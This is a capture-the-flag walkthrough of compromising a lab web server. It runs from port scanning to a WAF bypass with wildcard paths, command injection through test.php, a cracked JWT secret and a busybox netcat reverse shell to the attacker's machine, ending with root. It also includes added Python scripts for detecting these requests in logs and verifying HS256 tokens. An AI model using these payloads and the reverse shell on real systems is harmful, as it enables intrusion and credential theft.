Let's start off with an nmap scan against the remote host.
root@ubuntu:~/pentest# nmap -sV -sC -O -Pn -p- -T5 192.168.56.105
Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-16 15:57 MDT
Warning: 192.168.56.105 giving up on port because retransmission cap hit (2).
Stats: 0:02:27 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 16:00 (0:00:00 remaining)
Nmap scan report for 192.168.56.105
Host is up (0.00063s latency).
Not shown: 65529 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.27
|_http-server-header: Apache/2.4.27 (Ubuntu)
|_http-title: 403 Forbidden
MAC Address: 08:00:27:6A:86:41 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: Host: 127.0.1.1

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.38 seconds
root@ubuntu:~/pentest#
Nmap came back with only port 80 open. If we visit the website we see this:
Our next task is to hit it with nikto to see if it finds anything interesting.
root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.105
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.105
+ Target Hostname:    192.168.56.105
+ Target Port:        80
+ Start Time:         2019-10-16 16:02:24 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.4.27 (Ubuntu)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.27 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 56a9aee1bb80f, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ 7947 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2019-10-16 16:03:39 (GMT-6) (75 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program#
Nikto didn't come back with anything of interest. Let's try dirb and see what it finds.
+ http://192.168.56.105/.config (CODE:403|SIZE:296)
+ http://192.168.56.105/_vti_bin/_vti_adm/admin.dll (CODE:403|SIZE:316)
+ http://192.168.56.105/_vti_bin/_vti_aut/author.dll (CODE:403|SIZE:317)
+ http://192.168.56.105/_vti_bin/shtml.dll (CODE:403|SIZE:307)
+ http://192.168.56.105/awstats.conf (CODE:403|SIZE:301)
+ http://192.168.56.105/development.log (CODE:403|SIZE:304)
+ http://192.168.56.105/global.asa (CODE:403|SIZE:299)
+ http://192.168.56.105/global.asax (CODE:403|SIZE:300)
+ http://192.168.56.105/index.html (CODE:200|SIZE:10918)
+ http://192.168.56.105/main.mdb (CODE:403|SIZE:297)
+ http://192.168.56.105/php.ini (CODE:403|SIZE:296)
+ http://192.168.56.105/production.log (CODE:403|SIZE:303)
+ http://192.168.56.105/readfile (CODE:403|SIZE:416)
+ http://192.168.56.105/server-status (CODE:403|SIZE:302)
+ http://192.168.56.105/spamlog.log (CODE:403|SIZE:300)
+ http://192.168.56.105/thumbs.db (CODE:403|SIZE:298)
+ http://192.168.56.105/Thumbs.db (CODE:403|SIZE:298)
+ http://192.168.56.105/WS_FTP.LOG (CODE:403|SIZE:299)
It came back with results, but all of them are 403 Forbidden. Many of these paths (global.asa, _vti_bin and the like) are IIS artefacts that an Apache server would normally answer with a 404 rather than a 403, so something in front of the web server is probably filtering requests. Let's run wafw00f on the host and see what it says. Wafw00f came back with a positive result, so we know the website is behind a Web Application Firewall, and that firewall is ModSecurity. I decided to try wfuzz against it, looking for common files and extensions.
sam@ubuntu:~/src/wfuzz$ ./wfuzz -w /wordlist/general/big.txt -w /wordlist/general/extensions_common.txt --hc '403,404' -t 50 http://192.168.56.105/FUZZFUZ2Z
********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: http://192.168.56.105/FUZZFUZ2Z
Total requests: 84672

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000037784:   200        375 L    964 W    10918 Ch    "index - .html"
000076207:   200        40 L     159 W    1986 Ch     "test - .php"

sam@ubuntu:~/src/wfuzz$
Wfuzz came back with two files, index.html and test.php. Let's navigate to test.php and see what it is.
It looks like a browser identification page. If we view the source we find something interesting:
href='test.php?file=last.html
There could be an LFI/RFI in test.php. If we try to include /etc/passwd we get a 403 Forbidden, because the ModSecurity WAF blocks the request, so I had to google how to bypass ModSecurity.
http://192.168.56.105/test.php?file=/e?c/?asswd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
_apt:x:106:65534::/nonexistent:/bin/false
mysql:x:107:110:MySQL Server,,,:/nonexistent:/bin/false
uuidd:x:108:113::/run/uuidd:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
We find that the user bob exists on the box.
After playing around with the file parameter I found that it was vulnerable to command injection rather than file inclusion. The source of test.php explains why: the parameter is concatenated straight into a shell_exec() call (note there is no space after cat, so whatever we pass is appended directly to the command name):

<?php echo shell_exec('cat' . $_GET['file']);?>

http://192.168.56.105/test.php?file=a;/b?n/un?me%20-a
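From the defender's side, the wildcard bypass and the command injection above leave a characteristic trail in the Apache access log: a 403 on the literal /etc/passwd followed by a 200 on a glob-wildcard variant, then shell metacharacters in the same parameter. The script below is an added example, not part of the original write-up; it uses only the Python standard library and runs over constructed log lines modelled on the requests shown above, flagging shell metacharacters, wildcard paths, and absolute-path probes in the query string.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache access-log lines modelled on the requests in this
# write-up; they are not real log data from the target.
SAMPLE_LOG = """\
192.168.56.107 - - [16/Oct/2019:16:10:01 -0600] "GET /test.php?file=last.html HTTP/1.1" 200 1986
192.168.56.107 - - [16/Oct/2019:16:10:05 -0600] "GET /test.php?file=/etc/passwd HTTP/1.1" 403 296
192.168.56.107 - - [16/Oct/2019:16:10:09 -0600] "GET /test.php?file=/e?c/?asswd HTTP/1.1" 200 2104
192.168.56.107 - - [16/Oct/2019:16:10:14 -0600] "GET /test.php?file=a;/b?n/un?me%20-a HTTP/1.1" 200 131
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) '
                    r'(?P<target>\S+) [^"]*" (?P<status>\d{3})')
SHELL_META = re.compile(r'[;|&`$]')   # turns a file name into a second command
GLOB_CHARS = re.compile(r'[?*\[]')    # /e?c/?asswd is expanded by the shell, not seen by the WAF

def query_params(query):
    """Split a raw query string on '&' only and percent-decode key and value."""
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        yield unquote(key), unquote(raw)

def classify_request(target):
    """Return (kind, param, decoded value) findings for one request target."""
    findings = []
    for key, value in query_params(urlsplit(target).query):
        if SHELL_META.search(value):
            findings.append(("command-injection", key, value))
        elif GLOB_CHARS.search(value) and "/" in value:
            findings.append(("glob-wildcard-path", key, value))
        elif value.startswith("/") or ".." in value:
            findings.append(("path-traversal", key, value))
    return findings

def scan_log(text):
    """Parse access-log lines and return one alert dict per suspicious parameter."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for kind, key, value in classify_request(m.group("target")):
            alerts.append({"ip": m.group("ip"), "status": int(m.group("status")),
                           "kind": kind, "param": key, "value": value})
    return alerts

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The status column is the useful signal: a blocked (403) probe immediately followed by a 200 on a wildcard form of the same path means the WAF rule was evaded, not that the attacker gave up.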
If you remember, we found the user bob in the /etc/passwd file. Let's try to list bob's home directory and see if there is anything interesting in it.
http://192.168.56.105/test.php?file=last.html;%20$u%20ls%20-la%20/home/bob

-rw-r--r-- 1 bob bob 155 Apr 30 2018 ._pw_
We see the file ._pw_ in bob's home directory. To view the contents of ._pw_ we can use the head command:
http://192.168.56.105/test.php?file=last.html;%20$u%20head%20/home/bob/._pw_

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg
This is three dot-separated base64-encoded segments, each of which needs to be decoded. We can use the base64 utility to decode each segment; the middle one gives:
{"sub":"1234567890","name":"John Doe","iat":1516239022}
It turns out to be a JSON Web Token (the first segment decodes to the header {"alg":"HS256","typ":"JWT"}), and its HMAC secret can be brute-forced with c-jwt-cracker.
root@ubuntu:~/src/c-jwt-cracker# ./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg
Secret is "mlnV1"
root@ubuntu:~/src/c-jwt-cracker#
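To make concrete what the decode and crack steps above operate on, here is an added example (not part of the original write-up, and not c-jwt-cracker's code) using only the Python standard library. It decodes the header and payload of the token found in ._pw_ (JWT segments are base64url with the '=' padding stripped, which is why a plain base64 decoder may need padding appended), and checks an HS256 signature against a candidate secret the way a verifier should: constant-time comparison, and the algorithm fixed by the verifier rather than read from the token. The secret mlnV1 is the one the cracker reported; the other secret used in the self-check is constructed.

```python
import base64
import hashlib
import hmac
import json

# Token recovered from /home/bob/._pw_ in the write-up above.
TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
         "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
         "pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg")

def b64url_decode(segment):
    """JWT segments are base64url without '=' padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")

def decode_jwt(token):
    """Header and payload need no secret: a JWT is encoded, not encrypted."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))

def sign_hs256(header, payload, secret):
    """Build header.payload.signature with HMAC-SHA256 over the first two segments."""
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload))
    mac = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(mac)

def verify_hs256(token, secret):
    """True only if the third segment is HMAC-SHA256(secret, header.payload)."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":   # the verifier fixes the algorithm, never the token
        return False
    expected = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(),
                        hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))

if __name__ == "__main__":
    header, payload = decode_jwt(TOKEN)
    print(header, payload)
    # Check the secret c-jwt-cracker reported against the recovered token.
    print("mlnV1 verifies:", verify_hs256(TOKEN, "mlnV1"))
```

A five-character secret is within reach of an offline brute force precisely because verification is this cheap; HS256 secrets should be long random byte strings, not passwords.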
So now we have the secret, but first we need a shell on the box so we can issue commands from there instead of bypassing the WAF every time. One way to do this is with BusyBox, which combines tiny versions of many common UNIX utilities into a single small executable.
http://192.168.56.105/test.php?file=a;busybox nc 192.168.56.107 4444 -e sh -i
If we set up a listener on our local box we get a connection back and drop into a shell.
root@kali:~# nc -v -l -p 4444
listening on [any] 4444 ...
192.168.56.105: inverse host lookup failed: Unknown host
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.105] 48922

BusyBox v1.22.1 (Ubuntu 1:1.22.0-19ubuntu2) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/var/www/html$
If we try to su to user bob with the password 'mlnV1' we are denied, but if we try to su to root we get a root shell. So the password stored in bob's home directory is the root password for the box. When we cd to /root we see the flag.